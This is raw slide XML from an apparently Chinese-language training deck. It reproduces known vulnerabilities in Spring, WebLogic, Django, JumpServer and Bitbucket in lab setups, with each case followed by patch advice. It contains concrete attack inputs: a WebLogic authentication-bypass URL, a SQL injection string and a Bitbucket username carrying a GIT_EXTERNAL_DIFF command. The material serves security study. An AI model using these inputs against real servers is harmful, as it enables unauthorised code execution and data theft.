            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="16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9CB590B-125E-8BAF-D099-B9DBE259D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898" y="1428207"/>
            <a:ext cx="5066226" cy="356194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623" y="313822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Spring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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远程代码执行漏洞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(CVE-2022-22965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)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8345" y="1607185"/>
            <a:ext cx="8755380" cy="7118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lstStyle/>
          <a:p>
            <a:pPr marR="0" indent="457200" algn="l" defTabSz="9144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访问写入的程序时，将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pwd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参数设置为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j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，就可以执行目标命令，输出回显（还会有一些无关输出）：</a:t>
            </a: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048543" y="1073282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Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>漏洞复现（续）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74320" y="2542540"/>
            <a:ext cx="11643995" cy="187071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327660" y="3386455"/>
            <a:ext cx="2026920" cy="7620"/>
          </a:xfrm>
          <a:prstGeom prst="lin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855345" y="5043805"/>
            <a:ext cx="8755380" cy="7118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lstStyle/>
          <a:p>
            <a:pPr marR="0" indent="457200" algn="l" defTabSz="9144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更新Spring Framework 至安全版本。</a:t>
            </a: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175543" y="4509902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Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>修复建议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465" y="313690"/>
            <a:ext cx="9445625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weblogic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2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未授权命令执行漏洞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(CVE-2020-14882&amp;CVE-2020-14883)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8345" y="1515745"/>
            <a:ext cx="8755380" cy="13665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lstStyle/>
          <a:p>
            <a:pPr marR="0" indent="457200" algn="l" defTabSz="9144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未经身份验证的远程攻击者可能通过构造特殊的HTTP GET请求绕过身份验证登录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（CVE-2020-1488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3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）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，并可以构造特殊的请求执行命令（CVE-2020-14882），利用两个漏洞在受影响的WebLogic Server上执行任意代码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048543" y="981842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Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>漏洞介绍</a:t>
            </a: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728344" y="3406140"/>
            <a:ext cx="5046813" cy="15538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lstStyle/>
          <a:p>
            <a:pPr marR="0" indent="457200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1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首先使用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vulhub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靶场搭建环境，构造请求，添加二次URL编码过后的‘../’，绕过身份验证访问后台。http://172.27.48.1:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&amp;_pageLabel=AppDeploymentsControlPage&amp;handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29</a:t>
            </a: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175385" y="2872105"/>
            <a:ext cx="5294167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Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>漏洞复现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2011" y="3253175"/>
            <a:ext cx="5870575" cy="29368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465" y="313690"/>
            <a:ext cx="9597390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weblogic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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未授权命令执行漏洞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CVE-2020-14882&amp;CVE-2020-14883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8345" y="1607185"/>
            <a:ext cx="8755380" cy="9156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lstStyle/>
          <a:p>
            <a:pPr marR="0" indent="457200" algn="l" defTabSz="9144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构建请求，抓包并修改，使请求可以执行在目标位置添加文件‘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123.txt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’的命令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048543" y="1073282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Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>漏洞复现（续）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700" y="2131695"/>
            <a:ext cx="8328025" cy="416179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465" y="313690"/>
            <a:ext cx="9597390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weblogic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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未授权命令执行漏洞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CVE-2020-14882&amp;CVE-2020-14883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728345" y="1607185"/>
            <a:ext cx="9577705" cy="9156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lstStyle/>
          <a:p>
            <a:pPr marR="0" indent="457200" algn="l" defTabSz="9144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查看目标路径，发现目标文件被写入，命令被正确执行，同样的也可以执行类似调用系统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api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的命令。</a:t>
            </a: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048543" y="1073282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Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>漏洞复现（续）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45" y="2731770"/>
            <a:ext cx="10669270" cy="533400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733425" y="4295140"/>
            <a:ext cx="9577705" cy="91567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lstStyle/>
          <a:p>
            <a:pPr marR="0" indent="457200" algn="l" defTabSz="9144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更新针对该漏洞的补丁即可。</a:t>
            </a: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1053623" y="3761237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Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>漏洞修复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83E9022-6755-C79B-D4CF-E20989CF04C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7253323" y="5317958"/>
            <a:ext cx="4276366" cy="306467"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F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 panose="020F0502020204030204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264070D-B8E5-9F56-3C31-379594815988}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6909564" y="4028860"/>
            <a:ext cx="3451344" cy="306467"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="92D05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 panose="020F0502020204030204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C078BDB-3B88-7BCB-8994-9FACD70136FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6957691" y="2875002"/>
            <a:ext cx="2736325" cy="306467"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF0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 panose="020F0502020204030204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ED4A3E-057D-48F4-6444-414C76671339}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1053623" y="313822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Django SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1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注入漏洞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Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>(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CVE-2020-7471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Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>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A06CFF4-8E9B-CCA9-F0C2-FCE486C4A717}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275008" y="1065654"/>
            <a:ext cx="11784072" cy="92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漏洞介绍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2020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年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2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3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日，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Django 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官方发布安全通告公布了一个通过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StringAgg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（分隔符）实现利用的潜在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SQL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注入漏洞。攻击者可通过构造分隔符传递给聚合函数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contrib.postgres.aggregates.StringAgg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，从而绕过转义符号（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\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）并注入恶意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SQL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语句。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380B955-A6D5-228E-884D-299C6431416C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275008" y="2330353"/>
            <a:ext cx="8140223" cy="64633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环境搭建：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自主搭建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docker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环境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——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编写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dockerfile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文件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BD4ABA-8B44-CA97-8700-F04C45BDE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9" y="3145391"/>
            <a:ext cx="5995164" cy="293248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49F5A23-B6AD-6B8E-51E1-89C97B379E81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7005817" y="2875002"/>
            <a:ext cx="3038833" cy="55399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配置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3.0.2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的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django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漏洞环境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BF84377-8344-69F3-BFEA-BD41A4068793}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2550695" y="3022818"/>
            <a:ext cx="4262616" cy="25664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A5B7811-2B38-9D21-18C9-83D39485E8C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6909564" y="4090737"/>
            <a:ext cx="3691976" cy="2769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将所需要的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python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文件都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copy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下来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816BD6C5-E2DE-E2FE-8B8A-4567FB01A85E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3698851" y="4173239"/>
            <a:ext cx="3031958" cy="8250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4C0F84F-55CF-7C41-195F-541B21514760}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6146418" y="5211392"/>
            <a:ext cx="1038153" cy="25748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05CF11AD-559B-77D1-1351-9A0A0DD1A0A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7370201" y="5317958"/>
            <a:ext cx="4386370" cy="27699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运行一系列文件，并将环境暴露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8000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端口</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="268355982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CED4A3E-057D-48F4-6444-414C76671339}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1053623" y="313822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Django SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1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注入漏洞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Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>(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CVE-2020-7471</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN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Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>)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2E726C8-53B0-69E5-9669-8EDD3364ED74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="687518" y="973105"/>
            <a:ext cx="5637655" cy="23083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漏洞复现：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通过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python3 manage.py migrate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；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python3 manage.py </a:t>
            </a:r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makemigrations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vul_app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；</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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python3 manage.py migrate vul_app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初始化数据库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进入数据库，查看数据表，查看</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN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test1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US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表中的内容，发现已经有三行数据</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN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运行</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN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POC</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US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，发现漏洞利用成功！</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN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9AE884-AD80-D01C-2D42-F1BCDBA91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555" y="1136374"/>
            <a:ext cx="5204518" cy="152348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FE24FD6-0298-DB6C-C174-2D0D83C1C00C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="687518" y="3036198"/>
            <a:ext cx="11220308" cy="20313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漏洞原理及修复建议：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数据库对应的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SQL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语句为：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SELECT "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vul_app_info"."gender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", STRING_AGG("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vul_app_info"."name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", 'XXX') AS "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mydefinedname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" FROM "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vul_app_info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" GROUP BY "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vul_app_info"."gender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"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填入我们所使用的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payload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，就会组成：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SELECT "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vul_app_info"."gender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", STRING_AGG("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vul_app_info"."name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", '-') AS “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mydefinedname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" FROM "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vul_app_info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" GROUP BY "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vul_app_info"."gender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" LIMIT 1 OFFSET 1 -- ') AS "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mydefinedname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" FROM "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vul_app_info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" GROUP BY "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vul_app_info"."gender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"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6B8C44-02AA-E435-2E4D-BA9183A63D36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="577517" y="5480965"/>
            <a:ext cx="10596953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反斜杠的作用只是在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payload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字符串赋值时转义单引号，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payload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中的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-’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，使得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STRING_AGG(“</a:t>
            </a:r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vul_app_info”.“name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”, ‘-’)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右括号闭合了，导致了后面的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SQL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语句的执行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修复建议：更新到最新版本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DC6F052-B8FC-B6DB-DB74-8ADF075C6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18" y="4831543"/>
            <a:ext cx="10711543" cy="64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4477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CED4A3E-057D-48F4-6444-414C76671339}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1053623" y="313822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JumpServer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远程代码执行漏洞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CVE-2024-29201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53A3EB-ECCB-5B97-BE9B-12A5A70FEEA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="273575" y="935989"/>
            <a:ext cx="10850479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漏洞介绍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JumpServer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开源堡垒机采用了分布式架构设计 ，采用容器化的部署方式，支持多种资产类型和大规模资产纳管 ，可以支持高并发访问，满足企业用户在混合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IT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环境中的运维安全审计需求。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远程代码执行漏洞，具有低权限用户帐户的攻击者可通过构建恶意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playbook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模板绕过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Ansible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中的输入验证机制，从而在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Celery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容器中执行任意代码。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7149C6-1E79-5064-A716-67C497BEEEEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="273575" y="2634668"/>
            <a:ext cx="6094854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环境搭建：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自主搭建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docker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环境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——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编写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dockerfile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文件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907913-24FD-7A9D-82E5-95A645F05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5" y="3429000"/>
            <a:ext cx="6212096" cy="27398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4610E9-F21E-19E1-1C69-D4D8127AA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429" y="2835642"/>
            <a:ext cx="5428397" cy="2922082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49A43CC2-34BA-0C21-5CAE-A7F1FCD56FA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5273269" y="3373332"/>
            <a:ext cx="822731" cy="550247"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF0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6002192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CED4A3E-057D-48F4-6444-414C76671339}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1053623" y="313822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JumpServer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远程代码执行漏洞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CVE-2024-29201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EBF27C-BC15-F318-ABFF-E7BE2BD7297D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="359228" y="1114744"/>
            <a:ext cx="5560309" cy="2123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漏洞复现：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执行完我们的</a:t>
            </a:r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POC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后，运行我们的作业</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN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发现执行成功！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我们进一步在</a:t>
            </a:r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kali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中进入</a:t>
            </a:r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Celery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容器，查看</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="18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tmp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目录下，是否存在</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="18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pwnd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文件</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN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发现</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="18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pwnd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文件中存在注入</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN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9314386-42A1-4571-5714-F1C32BFB4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358" y="1016626"/>
            <a:ext cx="5427948" cy="26537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BB0C66D-9A41-5A18-4922-3566B8E9B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09" y="2986640"/>
            <a:ext cx="5311368" cy="74781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4C70911-17B4-9902-496C-E0040C8D9A6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="180472" y="3909969"/>
            <a:ext cx="12215492" cy="2400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漏洞原理及修复建议：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漏洞的关键在于</a:t>
            </a:r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Playbook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的内容可以被恶意构造，从而在执行时触发远程代码执行。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通过特定的</a:t>
            </a:r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Playbook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内容，攻击者可以利用</a:t>
            </a:r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Ansible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的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="18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delegate_to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参数，使得任务在特定的容器（如</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="18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jms_celery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）中执行。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN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需要修复，则更新至最新版即可。补丁处主要是：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN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引入了</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="18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SuperPlaybookRunner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类，这个类是</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="18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PlaybookRunner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的子类，并增加了一个条件判断，允许在</a:t>
            </a:r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localhost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上执行命令。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同时，升级了</a:t>
            </a:r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ansible-core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的版本，修改了</a:t>
            </a:r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/lib/ansible/plugins/connection/local.py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文件，增加了一个判断语句，如果没有设置</a:t>
            </a:r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LOCAL_CONNECTION_ENABLED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则默认禁用本地链接。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN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95064469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CED4A3E-057D-48F4-6444-414C76671339}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1053623" y="313822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JumpServer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远程代码执行漏洞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CVE-2024-29202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3013AAE-553B-F33D-EA71-CA468183C7FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="204823" y="902982"/>
            <a:ext cx="11397057" cy="1846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漏洞介绍</a:t>
            </a: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JumpServer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开源堡垒机采用了分布式架构设计 ，采用容器化的部署方式，支持多种资产类型和大规模资产纳管 ，可以支持高并发访问，满足企业用户在混合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IT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环境中的运维安全审计需求。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JINJA2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注入代码执行漏洞，具有低权限用户帐户的攻击者可通过构建恶意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playbook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模板利用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Ansible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中的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Jinja2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模板代码注入漏洞在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Celery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容器中执行任意代码。由于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Celery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容器以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root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权限运行并具有数据库访问权限，因此攻击者可以从所有主机窃取敏感信息或操纵数据库。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43F978-3186-99D7-D901-A1A580B68598}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="204823" y="2736158"/>
            <a:ext cx="6094854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环境搭建：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2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自主搭建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docker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环境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——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编写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dockerfile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文件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1C98B7-7548-EF03-7A78-7080F0296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75" y="3576312"/>
            <a:ext cx="6212096" cy="27398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2260D44-0EE0-09BF-63A5-885B4E1E4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429" y="2835642"/>
            <a:ext cx="5428397" cy="2922082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EE22F753-4AC0-30A8-F72F-B8C57F6047A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5273269" y="3373332"/>
            <a:ext cx="822731" cy="550247"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat">
            <a:solidFill>
              <a:schemeClr val="accent1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3310573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CED4A3E-057D-48F4-6444-414C76671339}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1053623" y="313822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JumpServer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远程代码执行漏洞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CVE-2024-29202</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2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86BFD1-2772-F447-94AC-339E21B2180C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="150994" y="929114"/>
            <a:ext cx="6786071" cy="184665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漏洞复现：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我们修改作业中心的模板管理，在工作空间中写入对应</a:t>
            </a:r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POC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脚本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，保存，运行即可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运行得到右图的结果，说明漏洞利用成功！</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN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我们查看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celery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容器中的文件，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发现多了一个新的文件</a:t>
            </a:r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pwnd2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，打开，发现成功插入了内容</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="18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uid</a:t>
            </a:r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=0(root) gid=0(root) groups=0(root)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876FA6E-BB4A-1EAC-97CA-EE13190A4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561" y="1275562"/>
            <a:ext cx="5179568" cy="20624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8673205-634C-174B-680F-BD1A9011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425" y="2775773"/>
            <a:ext cx="5449207" cy="80484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66C247D-BA64-B71A-966F-A149839A790B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281622" y="3770192"/>
            <a:ext cx="11392447" cy="240065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漏洞原理及修复建议：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攻击者可以构造特定的</a:t>
            </a:r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Playbook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内容，利用</a:t>
            </a:r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Ansible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的某些特性在服务器上执行远程代码。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN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攻击者可以通过特定的技术绕过正则表达式的过滤，使得恶意</a:t>
            </a:r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Playbook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内容能够被传递并执行。这可能涉及到利用</a:t>
            </a:r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Jinja2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模板的某些特性。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN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修复，只需要更新到最新版即可，补丁处主要为：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对</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="18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JumpServer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的代码进行了修改，特别是涉及到</a:t>
            </a:r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Playbook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处理的部分。具体来说，补丁启用了</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN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Jinja2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的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="18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SandboxedEnvironment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作为</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="18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NativeEnvironment</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="18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，以增强安全性。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN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2702674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752398-3308-A03A-0465-670599E3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545" y="539478"/>
            <a:ext cx="724210" cy="7276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0693DB5-3F92-9358-2098-62B1518F9BF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2751909" y="2171161"/>
            <a:ext cx="6688182" cy="2177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1219200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00AB7A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>Part 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00AB7A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>项目任务概述</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00AB7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08193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623" y="313822"/>
            <a:ext cx="10084182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a-DK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Bitbucket Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="da-DK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和 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK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Data Center</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="da-DK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存在命令注入漏洞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(CVE-2022-43781)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052830" y="981710"/>
            <a:ext cx="8862695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Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>漏洞介绍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728345" y="1515745"/>
            <a:ext cx="8755380" cy="9467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lstStyle/>
          <a:p>
            <a:pPr marR="0" indent="457200" algn="l" defTabSz="9144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kumimoji="0" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0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CVE-2022-43781中，Bitbucket </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline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Server或者Data</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0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 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="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Center中存在使用环境变量的命令注入漏洞。具有控制用户名权限的攻击者可以利用此问题在系统上执行代码</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="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。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052830" y="2585085"/>
            <a:ext cx="10687787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Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>漏洞复现（主要步骤）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830" y="4929080"/>
            <a:ext cx="8515350" cy="4768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052830" y="3129280"/>
            <a:ext cx="8092440" cy="251841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注册一个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username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格式为：用户名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空字符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命令的账户，如：</a:t>
            </a:r>
          </a:p>
          <a:p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rce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GIT_EXTERNAL_DIFF=touch${IFS}/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tmp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pwned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-git-ssh</a:t>
            </a:r>
          </a:p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但其会在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http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传输过程中特殊字符会失效（如空字符），因此需要抓包，将用户名改为所需要格式，空字符的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ascii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%00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，因此抓包改命令为如下格式。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${IFS}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代表一个环境变量，其会被解释为空格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800" y="3241675"/>
            <a:ext cx="2984500" cy="4159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623" y="313822"/>
            <a:ext cx="10084182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da-DK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Bitbucket Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="da-DK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和 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK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Data Center</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="da-DK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存在命令注入漏洞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(CVE-2022-43781)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"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750" y="3379470"/>
            <a:ext cx="10350500" cy="2616200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920908" y="1073282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Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>漏洞复现（续）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20750" y="2942590"/>
            <a:ext cx="8092440" cy="34671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en-US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结果如图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所示，成功创建了文件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67105" y="1607185"/>
            <a:ext cx="6096000" cy="55399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2.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利用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git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的远程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diff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操作来触发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diff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的环境变量以此来执行命令。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733" y="1482797"/>
            <a:ext cx="4354830" cy="1682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752398-3308-A03A-0465-670599E3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545" y="539478"/>
            <a:ext cx="724210" cy="7276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0693DB5-3F92-9358-2098-62B1518F9BF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2214154" y="2049790"/>
            <a:ext cx="7763691" cy="2177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1219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rgbClr val="00AB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/>
